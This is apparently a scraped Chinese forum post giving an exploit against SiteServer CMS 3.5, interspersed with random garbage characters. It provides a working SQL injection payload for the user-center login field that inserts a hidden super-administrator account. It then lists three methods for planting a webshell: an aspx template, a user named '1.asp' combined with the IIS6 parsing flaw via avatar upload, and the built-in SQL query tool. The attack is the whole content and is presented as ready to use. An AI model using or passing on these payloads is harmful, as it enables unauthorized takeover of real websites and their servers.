经测试秒杀最新的3.5版
4 z5 A) }# _7 {) \2 {6 hstieserver官网:www.siteserver.cn6 I- w. i1 n4 J; r" g
EXP:
& z3 p* Y5 a3 ?- ]直接访问UserCenter/login.aspx& }* V6 \ V7 i, q% Q
用户名处输入:; u: ?: X9 w8 g% \
- E" }5 L; W- H" n" h/ p% f1 p
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–! y, M, d/ \& |' X4 C1 a+ T, n
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
! O! i. N4 P& ]之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ ~" f2 n8 s$ c' A. ~! ~2 X% i- G9 [! M7 n后台拿webshell的三种方法:
" Z$ z7 }' w2 T3 v2 R+ @一、1 d7 {" Y0 n- }8 j, x) Y+ [
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' A/ u; G4 w& P! z5 W8 c0 v6 H8 e二、5 G. @1 D9 m0 m1 m P6 c5 S# T$ r0 r
成员权限-》添加用户-》用户名为:1.asp- }" D {/ Q' H- }7 a% ^# a
http://127.0.0.1/usercenter/' T, R/ A) b/ ?% |7 c- J! a
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 u6 X% ~# T+ G! j h(ps:后台添加用户时不会验证是否含有非法字符)( M/ `0 o! U- Y' g5 P! x: F3 W* z% g
三、% P( ]. b1 a2 \, u
系统工具-》实用工具-》机器参数查看# j$ ~( G2 @: h9 p! N P- d" O
可以看到数据库类型、名称,WEB路径% J2 Q- w+ H& \8 u8 I# X8 U) y! a: T3 [
系统工具-》数据库工具-》SQL语句查询; ^4 e: d3 h2 \+ _) z5 K: ?
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |